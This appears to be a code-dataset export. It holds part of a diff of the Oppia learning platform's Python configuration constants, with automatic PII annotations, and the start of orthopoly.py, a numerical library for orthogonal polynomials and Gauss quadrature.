+DEFAULT_LANGUAGE_CODE = 'en' + +# The id of the default skin. +# TODO(sll): Deprecate this; it is no longer used. +DEFAULT_SKIN_ID = 'conversation_v1' + +# The prefix for an 'accepted suggestion' commit message. +COMMIT_MESSAGE_ACCEPTED_SUGGESTION_PREFIX = 'Accepted suggestion by' + +# User id and username for exploration migration bot. Commits made by this bot +# are not reflected in the exploration summary models, but are recorded in the +# exploration commit log. +MIGRATION_BOT_USER_ID = 'OppiaMigrationBot' +MIGRATION_BOT_USERNAME = 'OppiaMigrationBot' + +# Ids and locations of the permitted extensions. +ALLOWED_RTE_EXTENSIONS = { + 'Collapsible': { + 'dir': os.path.join(RTE_EXTENSIONS_DIR, 'Collapsible') + }, + 'Image': { + 'dir': os.path.join(RTE_EXTENSIONS_DIR, 'Image') + }, + 'Link': { + 'dir': os.path.join(RTE_EXTENSIONS_DIR, 'Link') + }, + 'Math': { + 'dir': os.path.join(RTE_EXTENSIONS_DIR, 'Math') + }, + 'Tabs': { + 'dir': os.path.join(RTE_EXTENSIONS_DIR, 'Tabs') + }, + 'Video': { + 'dir': os.path.join(RTE_EXTENSIONS_DIR, 'Video') + }, +} + +# These categories and interactions are displayed in the order in which they +# appear in the interaction selector. 
+ALLOWED_INTERACTION_CATEGORIES = [{ + 'name': 'General', + 'interaction_ids': [ + 'Continue', + 'EndExploration', + 'ImageClickInput', + 'ItemSelectionInput', + 'MultipleChoiceInput', + 'TextInput' + ], +}, { + 'name': 'Math', + 'interaction_ids': [ + 'GraphInput', + 'LogicProof', + 'NumericInput', + 'SetInput', + 'MathExpressionInput', + ] +}, { + 'name': 'Programming', + 'interaction_ids': [ + 'CodeRepl', + 'PencilCodeEditor', + ], +}, { + 'name': 'Music', + 'interaction_ids': [ + 'MusicNotesInput' + ], +}, { + 'name': 'Geography', + 'interaction_ids': [ + 'InteractiveMap' + ], +}] + +ALLOWED_GADGETS = { + 'ScoreBar': { + 'dir': os.path.join(GADGETS_DIR, 'ScoreBar') + }, +} + +# Gadgets subclasses must specify a valid panel option from this list. +ALLOWED_GADGET_PANELS = ['bottom'] + +# Demo explorations to load through the admin panel. The id assigned to each +# exploration is based on the key of the exploration in this dict, so ensure it +# doesn't change once it's in the list. Only integer-based indices should be +# used in this list, as it maintains backward compatibility with how demo +# explorations used to be assigned IDs. The value of each entry in this dict is +# either a YAML file or a directory (depending on whether it ends in .yaml). +# These explorations can be found under data/explorations. +DEMO_EXPLORATIONS = { + u'0': 'welcome.yaml', + u'1': 'multiples.yaml', + u'2': 'binary_search', + u'3': 'root_linear_coefficient_theorem.yaml', + u'4': 'three_balls', + # TODO(bhenning): Replace demo exploration '5' with a new exploration + # described in #1376. + u'6': 'boot_verbs.yaml', + u'7': 'hola.yaml', + u'8': 'adventure.yaml', + u'9': 'pitch_perfect.yaml', + u'10': 'test_interactions', + u'11': 'modeling_graphs', + u'12': 'protractor_test_1.yaml', + u'13': 'solar_system', + u'14': 'about_oppia.yaml', + u'15': 'classifier_demo_exploration.yaml', + u'16': 'all_interactions', +} + +DEMO_COLLECTIONS = { + u'0': 'welcome_to_collections.yaml' +} + +# IDs of explorations which should not be displayable in either the learner or +# editor views. +DISABLED_EXPLORATION_IDS = ['5'] + +# Google Group embed URL for the Forum page. +EMBEDDED_GOOGLE_GROUP_URL = ( + 'https://groups.google.com/forum/embed/?place=forum/oppia') + +# Whether to allow YAML file uploads. +ALLOW_YAML_FILE_UPLOAD = False + +# Prefix for all taskqueue-related URLs. +TASKQUEUE_URL_PREFIX = '/task' +TASK_URL_FEEDBACK_MESSAGE_EMAILS = ( + '%s/email/batchfeedbackmessageemailhandler' % TASKQUEUE_URL_PREFIX) +TASK_URL_FEEDBACK_STATUS_EMAILS = ( + '%s/email/feedbackthreadstatuschangeemailhandler' % TASKQUEUE_URL_PREFIX) +TASK_URL_FLAG_EXPLORATION_EMAILS = ( + '%s/email/flagexplorationemailhandler' % TASKQUEUE_URL_PREFIX) +TASK_URL_INSTANT_FEEDBACK_EMAILS = ( + '%s/email/instantfeedbackmessageemailhandler' % TASKQUEUE_URL_PREFIX) +TASK_URL_SUGGESTION_EMAILS = ( + '%s/email/suggestionemailhandler' % TASKQUEUE_URL_PREFIX) + +# TODO(sll): Add all other URLs here. 
+ADMIN_URL = '/admin' +COLLECTION_DATA_URL_PREFIX = '/collection_handler/data' +EDITABLE_COLLECTION_DATA_URL_PREFIX = '/collection_editor_handler/data' +COLLECTION_RIGHTS_PREFIX = '/collection_editor_handler/rights' +COLLECTION_EDITOR_URL_PREFIX = '/collection_editor/create' +COLLECTION_URL_PREFIX = '/collection' +DASHBOARD_URL = '/dashboard' +DASHBOARD_CREATE_MODE_URL = '%s?mode=create' % DASHBOARD_URL +DASHBOARD_DATA_URL = '/dashboardhandler/data' +DASHBOARD_EXPLORATION_STATS_PREFIX = '/dashboardhandler/explorationstats' +EDITOR_URL_PREFIX = '/create' +EXPLORATION_DATA_PREFIX = '/createhandler/data' +EXPLORATION_INIT_URL_PREFIX = '/explorehandler/init' +EXPLORATION_METADATA_SEARCH_URL = '/exploration/metadata_search' +EXPLORATION_RIGHTS_PREFIX = '/createhandler/rights' +EXPLORATION_SUMMARIES_DATA_URL = '/explorationsummarieshandler/data' +EXPLORATION_URL_PREFIX = '/explore' +EXPLORATION_URL_EMBED_PREFIX = '/embed/exploration' +FEEDBACK_STATS_URL_PREFIX = '/feedbackstatshandler' +FEEDBACK_THREAD_URL_PREFIX = '/threadhandler' +FEEDBACK_THREADLIST_URL_PREFIX = '/threadlisthandler' +FEEDBACK_THREAD_VIEW_EVENT_URL = '/feedbackhandler/thread_view_event' +FLAG_EXPLORATION_URL_PREFIX = '/flagexplorationhandler' +LIBRARY_GROUP_DATA_URL = '/librarygrouphandler' +LIBRARY_INDEX_URL = '/library' +LIBRARY_INDEX_DATA_URL = '/libraryindexhandler' +LIBRARY_RECENTLY_PUBLISHED_URL = '/library/recently_published' +LIBRARY_SEARCH_URL = '/search/find' +LIBRARY_SEARCH_DATA_URL = '/searchhandler/data' +LIBRARY_TOP_RATED_URL = '/library/top_rated' +NEW_COLLECTION_URL = '/collection_editor_handler/create_new' +NEW_EXPLORATION_URL = '/contributehandler/create_new' +RECENT_COMMITS_DATA_URL = '/recentcommitshandler/recent_commits' +RECENT_FEEDBACK_MESSAGES_DATA_URL = '/recent_feedback_messages' +ROBOTS_TXT_URL = '/robots.txt' +SITE_FEEDBACK_FORM_URL = '' +SITE_LANGUAGE_DATA_URL = '/save_site_language' +SIGNUP_DATA_URL = '/signuphandler/data' +SIGNUP_URL = '/signup' +SPLASH_URL = '/splash' +SUGGESTION_ACTION_URL_PREFIX = '/suggestionactionhandler' +SUGGESTION_LIST_URL_PREFIX = '/suggestionlisthandler' +SUGGESTION_URL_PREFIX = '/suggestionhandler' +UPLOAD_EXPLORATION_URL = '/contributehandler/upload' +USERNAME_CHECK_DATA_URL = '/usernamehandler/data' + +NAV_MODE_ABOUT = 'about' +NAV_MODE_BLOG = 'blog' +NAV_MODE_COLLECTION = 'collection' +NAV_MODE_CONTACT = 'contact' +NAV_MODE_CREATE = 'create' +NAV_MODE_DASHBOARD = 'dashboard' +NAV_MODE_DONATE = 'donate' +NAV_MODE_EXPLORE = 'explore' +NAV_MODE_LIBRARY = 'library' +NAV_MODE_PROFILE = 'profile' +NAV_MODE_SIGNUP = 'signup' +NAV_MODE_SPLASH = 'splash' +NAV_MODE_TEACH = 'teach' +NAV_MODE_THANKS = 'thanks' + +# Event types. +EVENT_TYPE_STATE_HIT = 'state_hit' +EVENT_TYPE_ANSWER_SUBMITTED = 'answer_submitted' +EVENT_TYPE_DEFAULT_ANSWER_RESOLVED = 'default_answer_resolved' +EVENT_TYPE_NEW_THREAD_CREATED = 'feedback_thread_created' +EVENT_TYPE_THREAD_STATUS_CHANGED = 'feedback_thread_status_changed' +EVENT_TYPE_RATE_EXPLORATION = 'rate_exploration' +# The values for these event types should be left as-is for backwards +# compatibility. +EVENT_TYPE_START_EXPLORATION = 'start' +EVENT_TYPE_MAYBE_LEAVE_EXPLORATION = 'leave' +EVENT_TYPE_COMPLETE_EXPLORATION = 'complete' + +ACTIVITY_STATUS_PRIVATE = 'private' +ACTIVITY_STATUS_PUBLIC = 'public' +ACTIVITY_STATUS_PUBLICIZED = 'publicized' + +# Play type constants +PLAY_TYPE_PLAYTEST = 'playtest' +PLAY_TYPE_NORMAL = 'normal' + +# Predefined commit messages. +COMMIT_MESSAGE_EXPLORATION_DELETED = 'Exploration deleted.' 
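[Editor's note] The handler URLs above are composed from TASKQUEUE_URL_PREFIX once, at import time, so consumers read fully-formed paths. A tiny illustration (hypothetical consumer code, not part of Oppia; it assumes this configuration module is importable as feconf):

import feconf

# The taskqueue prefix is already baked into each handler URL.
assert feconf.TASKQUEUE_URL_PREFIX == '/task'
assert (feconf.TASK_URL_FEEDBACK_MESSAGE_EMAILS ==
        '/task/email/batchfeedbackmessageemailhandler')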
+COMMIT_MESSAGE_COLLECTION_DELETED = 'Collection deleted.' + +# Unfinished features. +SHOW_TRAINABLE_UNRESOLVED_ANSWERS = False +# Number of unresolved answers to be displayed in the dashboard for each +# exploration. +TOP_UNRESOLVED_ANSWERS_COUNT_DASHBOARD = 3 +# Number of open feedback to be displayed in the dashboard for each exploration. +OPEN_FEEDBACK_COUNT_DASHBOARD = 3 +# NOTE TO DEVELOPERS: This should be synchronized with base.js +ENABLE_STRING_CLASSIFIER = False +SHOW_COLLECTION_NAVIGATION_TAB_HISTORY = False +SHOW_COLLECTION_NAVIGATION_TAB_STATS = False + +# Output formats of downloaded explorations. +OUTPUT_FORMAT_JSON = 'json' +OUTPUT_FORMAT_ZIP = 'zip' + +# Types of updates shown in the 'recent updates' table in the dashboard page. +UPDATE_TYPE_EXPLORATION_COMMIT = 'exploration_commit' +UPDATE_TYPE_COLLECTION_COMMIT = 'collection_commit' +UPDATE_TYPE_FEEDBACK_MESSAGE = 'feedback_thread' + +# Possible values for user query status. +# Valid status transitions are: processing --> completed --> archived +# Or processing --> failed. +USER_QUERY_STATUS_PROCESSING = 'processing' +USER_QUERY_STATUS_COMPLETED = 'completed' +USER_QUERY_STATUS_ARCHIVED = 'archived' +USER_QUERY_STATUS_FAILED = 'failed' + +# The time difference between which to consider two login events ""close"". This +# is taken to be 12 hours. +PROXIMAL_TIMEDELTA_SECS = 12 * 60 * 60 + +DEFAULT_COLOR = '#a33f40' +DEFAULT_THUMBNAIL_ICON = 'Lightbulb' + +# List of supported default categories. For now, each category has a specific +# color associated with it. Each category also has a thumbnail icon whose +# filename is ""{{CategoryName}}.svg"". +CATEGORIES_TO_COLORS = { + 'Mathematics': '#cd672b', + 'Algebra': '#cd672b', + 'Arithmetic': '#d68453', + 'Calculus': '#b86330', + 'Logic': '#d68453', + 'Combinatorics': '#cf5935', + 'Graph Theory': '#cf5935', + 'Probability': '#cf5935', + 'Statistics': '#cd672b', + 'Geometry': '#d46949', + 'Trigonometry': '#d46949', + + 'Algorithms': '#d0982a', + 'Computing': '#bb8b2f', + 'Programming': '#d9aa53', + + 'Astronomy': '#879d6c', + 'Biology': '#97a766', + 'Chemistry': '#aab883', + 'Engineering': '#8b9862', + 'Environment': '#aba86d', + 'Medicine': '#97a766', + 'Physics': '#879d6c', + + 'Architecture': '#6e3466', + 'Art': '#895a83', + 'Music': '#6a3862', + 'Philosophy': '#613968', + 'Poetry': '#7f507f', + + 'English': '#193a69', + 'Languages': '#1b4174', + 'Latin': '#3d5a89', + 'Reading': '#193a69', + 'Spanish': '#405185', + 'Gaulish': '#1b4174', + + 'Business': '#387163', + 'Economics': '#5d8b7f', + 'Geography': '#3c6d62', + 'Government': '#538270', + 'History': '#3d6b52', + 'Law': '#538270', + + 'Education': '#942e20', + 'Puzzles': '#a8554a', + 'Sport': '#893327', + 'Welcome': '#992a2b', +} + +# Types of activities that can be created with Oppia. +ACTIVITY_TYPE_EXPLORATION = 'exploration' +ACTIVITY_TYPE_COLLECTION = 'collection' +ALL_ACTIVITY_TYPES = [ACTIVITY_TYPE_EXPLORATION, ACTIVITY_TYPE_COLLECTION] + +# A sorted list of default categories for which icons and background colours +# exist. +ALL_CATEGORIES = sorted(CATEGORIES_TO_COLORS.keys()) + +# These categories are shown in the library navbar. +SEARCH_DROPDOWN_CATEGORIES = sorted([ + 'Mathematics', + 'Statistics', + 'Algorithms', + 'Programming', + 'Biology', + 'Chemistry', + 'Physics', + 'Medicine', + 'English', + 'Architecture', + 'Art', + 'Music', + 'Reading', + 'Business', + 'Economics', + 'Geography', + 'History', +]) + +# The i18n id for the header of the ""Featured Activities"" category in the +# library index page. 
+LIBRARY_CATEGORY_FEATURED_ACTIVITIES = 'I18N_LIBRARY_GROUPS_FEATURED_ACTIVITIES' +# The i18n id for the header of the ""Top Rated Explorations"" category in the +# library index page. +LIBRARY_CATEGORY_TOP_RATED_EXPLORATIONS = ( + 'I18N_LIBRARY_GROUPS_TOP_RATED_EXPLORATIONS') +# The i18n id for the header of the ""Recently Published"" category in the +# library index page. +LIBRARY_CATEGORY_RECENTLY_PUBLISHED = 'I18N_LIBRARY_GROUPS_RECENTLY_PUBLISHED' + +# The group name that appears at the end of the url for the recently published +# page. +LIBRARY_GROUP_RECENTLY_PUBLISHED = 'recently_published' +# The group name that appears at the end of the url for the top rated page. +LIBRARY_GROUP_TOP_RATED = 'top_rated' + +# NOTE TO DEVELOPERS: The LIBRARY_PAGE_MODE constants defined below should have +# the same value as the ones defined in LIBRARY_PAGE_MODES in Library.js. For +# example LIBRARY_PAGE_MODE_GROUP should have the same value as +# LIBRARY_PAGE_MODES.GROUP. +# Page mode for the group pages such as top rated and recently published +# explorations. +LIBRARY_PAGE_MODE_GROUP = 'group' +# Page mode for the main library page. +LIBRARY_PAGE_MODE_INDEX = 'index' +# Page mode for the search results page. +LIBRARY_PAGE_MODE_SEARCH = 'search' + +# List of supported language codes. Each description has a +# parenthetical part that may be stripped out to give a shorter +# description. +ALL_LANGUAGE_CODES = [{ + 'code': 'en', 'description': u'English', +}, { + 'code': 'ar', 'description': u'العربية (Arabic)', +}, { + 'code': 'bg', 'description': u'български (Bulgarian)', +}, { + 'code': 'ca', 'description': u'català (Catalan)', +}, { + 'code': 'zh', 'description': u'中文 (Chinese)', +}, { + 'code': 'hr', 'description': u'hrvatski (Croatian)', +}, { + 'code': 'cs', 'description': u'čeština (Czech)', +}, { + 'code': 'da', 'description': u'dansk (Danish)', +}, { + 'code': 'nl', 'description': u'Nederlands (Dutch)', +}, { + 'code': 'tl', 'description': u'Filipino (Filipino)', +}, { + 'code': 'fi', 'description': u'suomi (Finnish)', +}, { + 'code': 'fr', 'description': u'français (French)', +}, { + 'code': 'de', 'description': u'Deutsch (German)', +}, { + 'code': 'el', 'description': u'ελληνικά (Greek)', +}, { + 'code': 'he', 'description': u'עברית (Hebrew)', +}, { + 'code': 'hi', 'description': u'हिन्दी (Hindi)', +}, { + 'code': 'hu', 'description': u'magyar (Hungarian)', +}, { + 'code': 'id', 'description': u'Bahasa Indonesia (Indonesian)', +}, { + 'code': 'it', 'description': u'italiano (Italian)', +}, { + 'code': 'ja', 'description': u'日本語 (Japanese)', +}, { + 'code': 'ko', 'description': u'한국어 (Korean)', +}, { + 'code': 'lv', 'description': u'latviešu (Latvian)', +}, { + 'code': 'lt', 'description': u'lietuvių (Lithuanian)', +}, { + 'code': 'no', 'description': u'Norsk (Norwegian)', +}, { + 'code': 'fa', 'description': u'فارسی (Persian)', +}, { + 'code': 'pl', 'description': u'polski (Polish)', +}, { + 'code': 'pt', 'description': u'português (Portuguese)', +}, { + 'code': 'ro', 'description': u'română (Romanian)', +}, { + 'code': 'ru', 'description': u'русский (Russian)', +}, { + 'code': 'sr', 'description': u'српски (Serbian)', +}, { + 'code': 'sk', 'description': u'slovenčina (Slovak)', +}, { + 'code': 'sl', 'description': u'slovenščina (Slovenian)', +}, { + 'code': 'es', 'description': u'español (Spanish)', +}, { + 'code': 'sv', 'description': u'svenska (Swedish)', +}, { + 'code': 'th', 'description': u'ภาษาไทย (Thai)', +}, { + 'code': 'tr', 'description': u'Türkçe (Turkish)', +}, { + 'code': 
'uk', 'description': u'українська (Ukrainian)', +}, { + 'code': 'vi', 'description': u'Tiếng Việt (Vietnamese)', +}] + +# Defaults for topic similarities +DEFAULT_TOPIC_SIMILARITY = 0.5 +SAME_TOPIC_SIMILARITY = 1.0 + +# NOTE TO DEVELOPERS: While adding another language, please ensure that the +# languages are in alphabetical order. +SUPPORTED_SITE_LANGUAGES = [{ + 'id': 'id', + 'text': 'Bahasa Indonesia' +}, { + 'id': 'en', + 'text': 'English' +}, { + 'id': 'es', + 'text': 'Español' +}, { + 'id': 'pt', + 'text': 'Português' +}, { + 'id': 'pt-br', + 'text': 'Português (Brasil)' +}, { + 'id': 'vi', + 'text': 'Tiếng Việt' +}, { + 'id': 'hi', + 'text': 'हिन्दी' +}] +SYSTEM_USERNAMES = [SYSTEM_COMMITTER_ID, MIGRATION_BOT_USERNAME] +SYSTEM_USER_IDS = [SYSTEM_COMMITTER_ID, MIGRATION_BOT_USERNAME] + +# The following are all page descriptions for the meta tag. +ABOUT_PAGE_DESCRIPTION = ( + 'Oppia is an open source learning platform that connects a community of ' + 'teachers and learners. You can use this site to create 1-1 learning ' + 'scenarios for others.') +BLOG_PAGE_DESCRIPTION = ( + 'Keep up to date with Oppia news and updates via our blog.') +CONTACT_PAGE_DESCRIPTION = ( + 'Contact the Oppia team, submit feedback, and learn how to get involved ' + 'with the Oppia project.') +CREATE_PAGE_DESCRIPTION = ( + 'Help others learn new things. Create lessons through explorations and ' + 'share your knowledge with the community.') +DASHBOARD_PAGE_DESCRIPTION = ( + 'Keep track of the lessons you have created, as well as feedback from ' + 'learners.') +DONATE_PAGE_DESCRIPTION = ( + 'Donate to The Oppia Foundation.') +FORUM_PAGE_DESCRIPTION = ( + 'Engage with the Oppia community by discussing questions, bugs and ' + 'explorations in the forum.') +LIBRARY_GROUP_PAGE_DESCRIPTION = ( + 'Discover top-rated or recently-published explorations on Oppia. Learn ' + 'from these explorations or help improve an existing one for the ' + 'community.') +LIBRARY_PAGE_DESCRIPTION = ( + 'Looking to learn something new? Find explorations created by professors, ' + 'teachers and Oppia users in a subject you\'re interested in, and start ' + 'exploring!') +PREFERENCES_PAGE_DESCRIPTION = ( + 'Change your Oppia profile settings and preferences') +SEARCH_PAGE_DESCRIPTION = ( + 'Discover a new exploration to learn from, or help improve an existing ' + 'one for the community.') +SIGNUP_PAGE_DESCRIPTION = ( + 'Sign up for Oppia and begin exploring a new subject.') +SPLASH_PAGE_DESCRIPTION = ( + 'Oppia is a free site for sharing knowledge via interactive lessons ' + 'called \'explorations\'. Learn from user-created explorations, or teach ' + 'and create your own.') +TEACH_PAGE_DESCRIPTION = ( + 'The Oppia library is full of user-created lessons called \'explorations\'.' + ' Read about how to participate in the community and begin creating ' + 'explorations.') +TERMS_PAGE_DESCRIPTION = ( + 'Oppia is a 501(c)(3) registered non-profit open-source e-learning ' + 'platform. Learn about our terms and conditions for creating and ' + 'distributing learning material.') +THANKS_PAGE_DESCRIPTION = ( + 'Thank you for donating to The Oppia Foundation.') +SITE_NAME = 'Oppia.org' + +# The type of the response returned by a handler when an exception is raised. 
+HANDLER_TYPE_HTML = 'html' +HANDLER_TYPE_JSON = 'json' +",30534,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['URL', ""https://groups.google.com/forum/embed/?place=forum/oppia'""], ['DATE_TIME', '2014'], ['PERSON', 'IS_MINIFIED'], ['PERSON', 'NUMBER_OF_TOP_RATED_EXPLORATIONS_FOR_LIBRARY_PAGE'], ['PERSON', 'ACCEPTED_IMAGE_FORMATS_AND_EXTENSIONS'], ['PERSON', ""r'^[A-Za-z0-9]+$""], ['PERSON', ""-Za-z]+)*$'""], ['PERSON', 'TODO'], ['PERSON', 'Committer'], ['PERSON', 'email_manager.py'], ['PERSON', 'DEFAULT_FEEDBACK_MESSAGE_EMAIL_PREFERENCE = True'], ['DATE_TIME', 'minutes'], ['PERSON', 'EMAIL_INTENT_EDITOR_ROLE_NOTIFICATION'], ['PERSON', ""EMAIL_INTENT_FEEDBACK_MESSAGE_NOTIFICATION = '""], ['PERSON', 'VALID_MODERATOR_ACTIONS'], ['PERSON', 'GADGET_PANEL_AXIS_HORIZONTAL'], ['DATE_TIME', '10'], ['DATE_TIME', '14'], ['DATE_TIME', '40'], ['LOCATION', 'UserStatsModel'], ['DATE_TIME', ""OppiaMigrationBot'""], ['URL', 'os.path.jo'], ['LOCATION', 'ALLOWED_INTERACTION_CATEGORIES'], ['PERSON', 'MultipleChoiceInput'], ['PERSON', 'SetInput'], ['PERSON', 'EDITOR_URL_PREFIX'], ['NRP', 'EXPLORATION_METADATA_SEARCH_URL'], ['PERSON', 'SUGGESTION_URL_PREFIX'], ['PERSON', 'NAV_MODE_COLLECTION'], ['LOCATION', 'NAV_MODE_LIBRARY'], ['PERSON', 'EVENT_TYPE_DEFAULT_ANSWER_RESOLVED'], ['PERSON', ""EVENT_TYPE_THREAD_STATUS_CHANGED = '""], ['PERSON', 'EVENT_TYPE_MAYBE_LEAVE_EXPLORATION'], ['PERSON', 'USER_QUERY_STATUS_ARCHIVED'], ['DATE_TIME', '12 hours'], ['PERSON', 'Lightbulb'], ['DATE_TIME', ""8b9862'""], ['DATE_TIME', ""405185'""], ['PERSON', ""u'български""], ['NRP', 'Bulgarian'], ['NRP', 'Chinese'], ['NRP', 'Croatian'], ['NRP', 'Czech'], ['NRP', 'Danish'], ['NRP', 'Dutch'], ['PERSON', ""u'Filipino""], ['NRP', 'Finnish'], ['NRP', 'French'], ['NRP', 'German'], ['NRP', 'Greek'], ['PERSON', ""u'magyar""], ['NRP', 'Hungarian'], ['LOCATION', 'Indonesia'], ['NRP', 'Indonesian'], ['NRP', 'Italian'], ['NRP', 'Japanese'], ['PERSON', 'ko'], ['NRP', 'Korean'], ['NRP', 'Latvian'], ['NRP', 'Lithuanian'], ['NRP', 'Norwegian'], ['NRP', 'Persian'], ['NRP', 'Polish'], ['NRP', 'Portuguese'], ['PERSON', ""u'română""], ['NRP', 'Romanian'], ['NRP', 'Russian'], ['NRP', 'Serbian'], ['PERSON', ""u'slovenčina""], ['NRP', 'Slovak'], ['NRP', 'Slovenian'], ['NRP', 'Spanish'], ['DATE_TIME', ""u'svenska""], ['NRP', 'Swedish'], ['NRP', 'Thai'], ['NRP', 'Turkish'], ['NRP', 'Ukrainian'], ['NRP', 'Vietnamese'], ['LOCATION', 'Indonesia'], ['PERSON', 'Tiếng'], ['PERSON', 'TEACH_PAGE_DESCRIPTION'], ['PERSON', 'THANKS_PAGE_DESCRIPTION'], ['URL', 'http://www.apache.org/licenses/LICENSE-2.0'], ['URL', 'os.environ.ge'], ['URL', 'os.environ.ge'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.ge'], ['URL', 'services.py'], ['URL', 'copy.de'], ['URL', 'mailgun.org'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'manager.py'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'COLORS.ke'], ['URL', 'MODES.GR'], ['URL', 'Oppia.org']]" +5,""""""" + orthopoly.py - A suite of functions for generating orthogonal polynomials + and quadrature rules. + + Copyright (c) 2014 Greg von Winckel + All rights reserved. 
+ + Permission is hereby granted, free of charge, to any person obtaining + a copy of this software and associated documentation files (the + ""Software""), to deal in the Software without restriction, including + without limitation the rights to use, copy, modify, merge, publish, + distribute, sublicense, and/or sell copies of the Software, and to + permit persons to whom the Software is furnished to do so, subject to + the following conditions: + + The above copyright notice and this permission notice shall be + included in all copies or substantial portions of the Software. + + THE SOFTWARE IS PROVIDED ""AS IS"", WITHOUT WARRANTY OF ANY KIND, + EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF + MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. + IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY + CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, + TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE + SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. + + Last updated on Wed Jan 1 14:29:25 MST 2014 + + Modified by David A. Ham (dummy@email.com), 2016 +"""""" + +import numpy as np +from functools import reduce +from math import gamma + + +def gauss(alpha, beta): + """""" + Compute the Gauss nodes and weights from the recursion + coefficients associated with a set of orthogonal polynomials + + Inputs: + alpha - recursion coefficients + beta - recursion coefficients + + Outputs: + x - quadrature nodes + w - quadrature weights + + Adapted from the MATLAB code by Walter Gautschi + http://www.cs.purdue.edu/archives/2002/wxg/codes/gauss.m + """""" + + from numpy.linalg import eigh + + A = np.diag(np.sqrt(beta)[1:], 1) + np.diag(alpha) + x, V = eigh(A, ""U"") + + w = beta[0] * np.real(np.power(V[0, :], 2)) + return x, w + + +def lobatto(alpha, beta, xl1, xl2): + """""" + Compute the Lobatto nodes and weights with the preassigned + nodes xl1, xl2 + + Inputs: + alpha - recursion coefficients + beta - recursion coefficients + xl1 - assigned node location + xl2 - assigned node location + + Outputs: + x - quadrature nodes + w - quadrature weights + + Based on section 7 of the paper + ""Some modified matrix eigenvalue problems"" + by Gene Golub, SIAM Review Vol 15, No.
2, April 1973, pp.318--334 + """""" + from numpy.linalg import solve + n = len(alpha) - 1 + en = np.zeros(n) + en[-1] = 1 + A1 = np.vstack((np.sqrt(beta), alpha - xl1)) + J1 = np.diag(A1[0, 1:-1], 1) + np.diag(A1[1, 1:]) + np.diag(A1[0, 1:-1], -1) + A2 = np.vstack((np.sqrt(beta), alpha - xl2)) + J2 = np.diag(A2[0, 1:-1], 1) + np.diag(A2[1, 1:]) + np.diag(A2[0, 1:-1], -1) + g1 = solve(J1, en) + g2 = solve(J2, en) + C = np.array(((1, -g1[-1]), (1, -g2[-1]))) + xl = np.array((xl1, xl2)) + ab = solve(C, xl) + + alphal = alpha + alphal[-1] = ab[0] + betal = beta + betal[-1] = ab[1] + x, w = gauss(alphal, betal) + return x, w + + +def rec_jacobi(N, a, b): + """""" + Generate the recursion coefficients alpha_k, beta_k + + P_{k+1}(x) = (x-alpha_k)*P_{k}(x) - beta_k P_{k-1}(x) + + for the Jacobi polynomials which are orthogonal on [-1,1] + with respect to the weight w(x)=[(1-x)^a]*[(1+x)^b] + + Inputs: + N - polynomial order + a - weight parameter + b - weight parameter + + Outputs: + alpha - recursion coefficients + beta - recursion coefficients + + Adapted from the MATLAB code by Dirk Laurie and Walter Gautschi + http://www.cs.purdue.edu/archives/2002/wxg/codes/r_jacobi.m + """""" + + nu = (b - a) / float(a + b + 2) + mu = 2 ** (a + b + 1) * gamma(a + 1) * gamma(b + 1) / gamma(a + b + 2) + + if N == 1: + alpha = nu + beta = mu + else: + n = np.arange(1.0, N) + nab = 2 * n + a + b + alpha = np.hstack((nu, (b ** 2 - a ** 2) / (nab * (nab + 2)))) + n = n[1:] + nab = nab[1:] + B1 = 4 * (a + 1) * (b + 1) / float((a + b + 2) ** 2 * (a + b + 3)) + B = 4 * (n + a) * (n + b) * n * (n + a + b) / \ + (nab ** 2 * (nab + 1) * (nab - 1)) + beta = np.hstack((mu, B1, B)) + + return alpha, beta + + +def rec_jacobi01(N, a, b): + """""" + Generate the recursion coefficients alpha_k, beta_k + for the Jacobi polynomials which are orthogonal on [0,1] + + See rec_jacobi for the recursion coefficients on [-1,1] + + Inputs: + N - polynomial order + a - weight parameter + b - weight parameter + + Outputs: + alpha - recursion coefficients + beta - recursion coefficients + + Adapted from the MATLAB implementation: + https://www.cs.purdue.edu/archives/2002/wxg/codes/r_jacobi01.m + + """""" + + if a <= -1 or b <= -1: + raise ValueError('''Jacobi coefficients are defined only + for alpha,beta > -1''') + + if not isinstance(N, int): + raise TypeError('N must be an integer') + + if N < 1: + raise ValueError('N must be at least 1') + + c, d = rec_jacobi(N, a, b) + + alpha = (1 + c) / 2 + beta = d / 4 + beta[0] = d[0] / 2 ** (a + b + 1) + + return alpha, beta + + +def polyval(alpha, beta, x): + """""" + Evaluate polynomials on x given the recursion coefficients alpha and beta + """""" + + N = len(alpha) + m = len(x) + P = np.zeros((m, N + 1)) + + P[:, 0] = 1 + P[:, 1] = (x - alpha[0]) * P[:, 0] + + for k in range(1, N): + P[:, k + 1] = (x - alpha[k]) * P[:, k] - beta[k] * P[:, k - 1] + + return P + + +def jacobi(N, a, b, x, NOPT=1): + """""" + JACOBI computes the Jacobi polynomials which are orthogonal on [-1,1] + with respect to the weight w(x)=[(1-x)^a]*[(1+x)^b] and evaluates them + on the given grid up to P_N(x).
